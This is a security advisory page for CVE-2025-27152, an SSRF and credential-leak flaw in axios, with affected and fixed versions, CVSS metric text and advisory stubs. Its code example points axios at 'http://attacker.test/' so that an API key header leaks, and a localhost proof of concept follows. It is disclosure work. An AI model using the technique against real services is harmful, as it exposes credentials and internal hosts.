CVE-2025-27152

ADVISORY - github

Summary

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

  • When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
  • Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
  1. Create a script (e.g., main.js):
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
  1. Run the script:
$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

  • Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.
EPSS Score: 0.00026 (0.053)

Common Weakness Enumeration (CWE)

ADVISORY - nist

Server-Side Request Forgery (SSRF)

ADVISORY - github

Server-Side Request Forgery (SSRF)

ADVISORY - gitlab

OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Server-Side Request Forgery (SSRF)

OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities


GitHub

CREATED

UPDATED

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)

CVSS SCORE

7.7high
PackageTypeOS NameOS VersionAffected RangesFix Versions
axiosnpm-->=1.0.0,<1.8.21.8.2
axiosnpm--<0.30.00.30.0

CVSS:4 Severity and metrics

The CVSS metrics represent different qualitative aspects of a vulnerability that impact the overall score, as defined by the CVSS Specification.

The vulnerable component is bound to the network stack, but the attack is limited at the protocol level to a logically adjacent topology. This can mean an attack must be launched from the same shared physical (e.g., Bluetooth or IEEE 802.11) or logical (e.g., local IP subnet) network, or from within a secure or otherwise limited administrative domain (e.g., MPLS, secure VPN to an administrative network zone). One example of an Adjacent attack would be an ARP (IPv4) or neighbor discovery (IPv6) flood leading to a denial of service on the local LAN segment (e.g., CVE-2013-6014).

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

The successful attack does not depend on the deployment and execution conditions of the vulnerable system. The attacker can expect to be able to reach the vulnerability and execute the exploit under all or most instances of the vulnerability.

The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.

The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges.

There is a total loss of confidentiality, resulting in all information within the Vulnerable System being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

There is no loss of confidentiality within the Subsequent System or all confidentiality impact is constrained to the Vulnerable System.

There is no loss of integrity within the Vulnerable System.

There is no loss of integrity within the Subsequent System or all integrity impact is constrained to the Vulnerable System.

There is no impact to availability within the Vulnerable System.

There is no impact to availability within the Subsequent System or all availability impact is constrained to the Vulnerable System.

NIST

CREATED

UPDATED

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)

CVSS SCORE

7.7high

Debian

CREATED

UPDATED

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
RATING UNAVAILABLE FROM ADVISORY

Ubuntu

CREATED

UPDATED

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-

CVSS SCORE

N/Amedium

Chainguard

CREATED

UPDATED

ADVISORY ID

CGA-3v2g-qxr9-6p2f

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
RATING UNAVAILABLE FROM ADVISORY

Chainguard

CREATED

UPDATED

ADVISORY ID

CGA-642h-h99q-qpr5

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
RATING UNAVAILABLE FROM ADVISORY

Chainguard

CREATED

UPDATED

ADVISORY ID

CGA-cw47-g5xg-vcxc

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
RATING UNAVAILABLE FROM ADVISORY

Chainguard

CREATED

UPDATED

ADVISORY ID

CGA-f8gr-r69c-89fc

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
RATING UNAVAILABLE FROM ADVISORY

Chainguard

CREATED

UPDATED

ADVISORY ID

CGA-g7p6-q4mx-2jg4

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
RATING UNAVAILABLE FROM ADVISORY

Chainguard

CREATED

UPDATED

ADVISORY ID

CGA-gf4m-xr23-p87v

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
RATING UNAVAILABLE FROM ADVISORY

Chainguard

CREATED

UPDATED

ADVISORY ID

CGA-xq8x-44v3-qrv4

EXPLOITABILITY SCORE

-

EXPLOITS FOUND
-
COMMON WEAKNESS ENUMERATION (CWE)-
RATING UNAVAILABLE FROM ADVISORY